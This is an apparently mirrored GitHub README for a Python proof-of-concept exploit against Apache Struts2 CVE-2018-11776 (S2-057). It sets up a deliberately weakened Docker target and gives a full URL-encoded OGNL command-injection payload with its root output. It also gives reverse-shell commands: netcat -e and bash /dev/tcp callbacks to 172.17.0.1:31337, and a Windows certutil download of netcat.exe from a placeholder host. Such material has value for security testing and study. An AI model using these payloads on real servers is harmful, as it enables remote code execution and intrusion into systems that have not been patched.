Git Product home page Git Product logo

cve-2018-11776-python-poc's Introduction

CVE-2018-11776-Python-PoC

hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

Working Python test and PoC for CVE-2018-11776, originally appearing on; https://github.com/hook-s3c/CVE-2018-11776-Python-PoC

Set up your docker instance

exploit will work fine with the docker container build for cve-2017-5638 (struts2-showcase-2.3.12)

$ docker pull piesecurity/apache-struts2-cve-2017-5638
$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638

Set up your weakened configuration

$ apt-get install vim
$ vim /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml

add the configuration below;

<action name="help">
            <result type="redirectAction">
                    <param name="actionName">date.action</param>
            </result>
    </action>

and also;

<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

restart your tomcat and/or container

$ /usr/local/tomcat/bin/shutdown.sh

Verify that target is vulnerable

test the url to see if a redirect and evaluation occurs;

http://0.0.0.0:32771/${2+2}/help.action > http://0.0.0.0:32771/4/date.action

with the test script;

$ ./exploitS2-057-test.py http://0.0.0.0:32771/showcase.action
testing the url for exploit; http://0.0.0.0:32771/${12612+24867}/help.action
URL http://0.0.0.0:32771/showcase.action s2-057 CVE-2018-11776 is vulnerable!

Execute commands PoC

$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'id'
[Execute]: id
[Url]: http://0.0.0.0:32771/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action



uid=0(root) gid=0(root) groups=0(root)

Reverse shell

get your box ready to accept the reverse shell;

$ netcat -lvp 31337

run the script;

# you'll want to install netcat
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'apt-get install netcat -y'

# now pop that shell 
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'netcat -e "$SHELL" 172.17.0.1 31337'

replace 32771 with your exposed container port

Updated method via Bash, forward-slashes now supported.

$ netcat -lvp 31337

$ ./exploitS2-057-cmd.py 0.0.0.0:32771 "/bin/bash -i >& /dev/tcp/172.17.0.1/31337 0>&1"

Windows reverse shell (untested)

# grab netcat binary
# https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools

$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'certutil.exe -urlcache -split -f "https://yourhostingservice.1337/files/netcat.exe" nc.exe'

# execute
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'nc.exe 172.17.0.1 31337 –e cmd.exe'

Debug hell (notes)

All requests with a forward-slash (/) will fail because Tomcat actively blocks these, you may need to work around this, for example using environment variables for /bin/bash as $SHELL in the example above.

With this in mind, the windows /c flag will not work as expected. I've only tested this on the docker container.

Update

Thanks to @Menin_TheMiddle for showing that the forward-slash issue can be resolved, the code now supports forward-slashes and so a reverse shell without netcat via bash is now also possible, also now supports Windows instances (untested).

Mitigation

Patch your Struts, or simply don't use it.

I guess you can always sell identify fraud products if you happen to have a breach and all your customer details are leaked! (you know who you are, absolute scum)

Credit

Thanks to ;

Greetz

shout out to vap0rsquad!!! sH3llG0d - Willow - D@3M0¢π1 - n4t4s - 23pieces

cve-2018-11776-python-poc's People

Contributors

hook-s3c avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.